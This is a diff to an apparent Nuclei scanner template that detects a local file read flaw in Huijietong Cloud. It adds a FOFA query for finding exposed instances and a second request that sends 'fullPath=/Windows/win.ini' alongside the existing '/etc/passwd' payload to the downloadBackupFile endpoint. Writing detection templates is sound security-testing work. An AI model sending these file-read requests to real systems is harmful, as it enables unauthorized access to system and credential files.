--- a/vulnerabilities/other/huijietong-cloud-fileread.yaml
+++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml
@@ -2,8 +2,10 @@ id: huijietong-cloud-fileread
 
 info:
   name: Huijietong Cloud File Read
-  author: princechaddha
+  author: princechaddha,ritikchaddha
   severity: high
+  metadata:
+    fofa-query: body="/him/api/rest/v1.0/node/role"
   tags: huijietong,lfi
 
 requests:
@@ -11,13 +13,21 @@ requests:
     path:
       - "{{BaseURL}}/fileDownload?action=downloadBackupFile"
     body: 'fullPath=/etc/passwd'
+    
+  - method: POST
+    path:
+      - "{{BaseURL}}/fileDownload?action=downloadBackupFile"
+    body: 'fullPath=/Windows/win.ini'
 
     matchers-condition: and
     matchers:
 
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
+          - "for 16-bit app support"
+        condition: or
 
       - type: status
         status:
